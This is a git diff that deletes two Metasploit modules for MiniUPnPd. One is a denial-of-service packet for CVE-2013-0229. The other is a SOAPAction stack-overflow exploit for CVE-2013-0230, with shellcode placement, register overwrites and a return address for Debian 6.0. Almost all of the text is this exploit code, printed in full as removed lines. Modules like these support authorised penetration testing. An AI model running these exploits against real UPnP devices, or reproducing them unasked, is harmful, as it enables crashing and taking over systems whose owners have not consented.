diff --git a/modules/exploits/multi/upnp/miniupnpd_dos.rb b/modules/exploits/multi/upnp/miniupnpd_dos.rb deleted file mode 100644 index 5d3fc903e2..0000000000 --- a/modules/exploits/multi/upnp/miniupnpd_dos.rb +++ /dev/null @@ -1,86 +0,0 @@ -## -# This file is part of the Metasploit Framework and may be subject to -# redistribution and commercial restrictions. Please see the Metasploit -# web site for more information on licensing and terms of use. -# http://metasploit.com/ -## - -require 'msf/core' - -class Metasploit3 < Msf::Auxiliary - - include Msf::Exploit::Remote::Udp - include Msf::Auxiliary::Dos - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'MiniUPnPd < 1,4 denial of service (DoS) exploit', - 'Description' => - %q{ - This module allows remote attackers to cause a denial of service in MiniUPnP 1.0 - server via specifically crafted UDP request. This vulnerability was identified - as CVE-2013-0229. - }, - 'Author' => [ 'Dejan Lukan' ], - 'License' => MSF_LICENSE, - 'Version' => '$Revision: 9999 $', - 'References' => [ - [ 'CVE', '2013-0229' ], - [ 'OSVDB', '89625' ], - ], - 'DisclosureData' => 'Mar 27 2013', - )) - - register_options( - [ - Opt::RPORT(1900), - ], self.class) - end - - def run - # connect to the UDP port - connect_udp - - # the M-SEARCH packet that is being read line by line: there shouldn't be CRLF after the - # ST line - sploit = "M-SEARCH * HTTP/1.1\r\n"\ - "HOST: 239.255.255.250:1900\r\n"\ - "ST:uuid:schemas:device:MX:3" - - # the packet can be at most 1500 bytes long, so add appropriate number of ' ' or '\t' - # this makes the DoS exploit more probable, since we're occupying the stack with arbitrary - # characters: there's more chance that the the program will run off the stack. - sploit += ' '*(1500-sploit.length) - - # send the exploit to the target - print_status("Sending malformed packet to #{rhost}...") - udp_sock.put(sploit) - - # disconnect from the server - print_status("The target should be unresponsive now...") - disconnect_udp - end -end - - - - - - - - - - - - - - - - - - - - - - - diff --git a/modules/exploits/multi/upnp/miniupnpd_stack_overflow_1.0.rb b/modules/exploits/multi/upnp/miniupnpd_stack_overflow_1.0.rb deleted file mode 100644 index 329317f3f6..0000000000 --- a/modules/exploits/multi/upnp/miniupnpd_stack_overflow_1.0.rb +++ /dev/null @@ -1,156 +0,0 @@ -## -# This file is part of the Metasploit Framework and may be subject to -# redistribution and commercial restrictions. Please see the Metasploit -# web site for more information on licensing and terms of use. -# http://metasploit.com/ -## - - -require 'msf/core' - -class Metasploit3 < Msf::Exploit::Remote - - include Msf::Exploit::Remote::HttpClient - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'MiniUPnPd 1.0 stack overflow remote code execution', - 'Description' => - %q{ - This module exploits the MiniUPnP 1.0 SOAP stack overflow vulnerability present - in the SOAPAction HTTP header. This vulnerability was identified as CVE-2013-0230. - }, - 'Author' => [ 'Dejan Lukan' ], - 'License' => MSF_LICENSE, - 'Version' => '$Revision: 9999 $', - 'DefaultOptions' => { 'EXITFUNC' => 'process', }, - # the byte '\x22' is the '"' character and the miniupnpd scans for that character in the - # input, which is why it can't be part of the shellcode (otherwise the vulnerable part - # of the program is never reached) - 'Payload' => { 'Space' => 2060, 'BadChars' => "\x00\x22", 'DisableNops' => true }, - 'Platform' => 'linux', - 'References' => [ - [ 'CVE', '2013-0230' ], - [ 'OSVDB', '89624' ], - ], - 'Targets' => - [ - #['Debian GNU/Linux 4.0', { 'Ret' => 0x0804c334, 'Offset' => 2123 }], - ['Debian GNU/Linux 6.0', { 'Ret' => 0x0804ee43, 'Offset' => 2123 }], - ], - 'DefaultTarget' => 0, - 'Privileged' => false, - 'DisclosureData' => 'Mar 27 2013', - )) - - register_options( - [ - Opt::RPORT(5555), - ], self.class) - end - - - def check - packet = "M-SEARCH * HTTP/1.1\r\n \ - HOST: 239.255.255.250:1900\r\n \ - ST: ssdp:all\r\n \ - MX:2\r\n \ - MAN:\"ssdp:discover\"\r\n" - end - - - def exploit - # - # Build the SOAP Exploit - # - # jmp 0x2d ; jump forward 0x2d bytes (jump right after the '#' char) - sploit = "\xeb\x2d" - - # a valid action - sploit += "n:schemas-upnp-org:service:WANIPConnection:1#" - - # payload - sploit += payload.encoded - - # nops - #sploit += "\x90"*(target['Offset'] - sploit.length - 16) - sploit += rand_text(target['Offset'] - sploit.length - 16) - - # overwrite registers on stack - sploit += "\x41\x41\x41\x41" # overwrite EBX - sploit += "\x42\x42\x42\x42" # overwrite ESI - sploit += "\x43\x43\x43\x43" # overwrite EDI - sploit += "\x44\x44\x44\x44" # overwrite EBP - - # Overwrite EIP with addresss of "pop ebp, ret", because the second value on the - # stack points directly to the string after 'Soapaction: ', which is why we must - # throw the first value on the stack away, which we're doing with the pop ebp - # instruction. Then we're returning to the next value on the stack, which is - # exactly the address that we want. - sploit += [target.ret].pack('V') - - # the ending " character is necessary for the vulnerability to be reached - sploit += "\"" - - # data sent in the POST body - data = - "\r\n" + - "\r\n" + - "\r\n" + - "\r\n" + - "\r\n" + - "\r\n" + - "\r\n" - - - # - # Build and send the HTTP request - # - print_status("Sending exploit to victim #{target.name} at ...") - send_request_raw({ - 'uri' => target_uri.path, - 'method' => 'POST', - 'headers' => { - 'SOAPAction' => sploit, - #'User-Agent' => 'Python-urllib/2.7', - #'Connection' => 'close', - #'Content-Type' => 'application/x-www-form-urlencoded', - }, - 'data' => data, - }, 25) - - - # handle the exploit - handler - - # disconnect from the server - disconnect - end -end - - - - - - - - - - - - - - - - - - - - - - -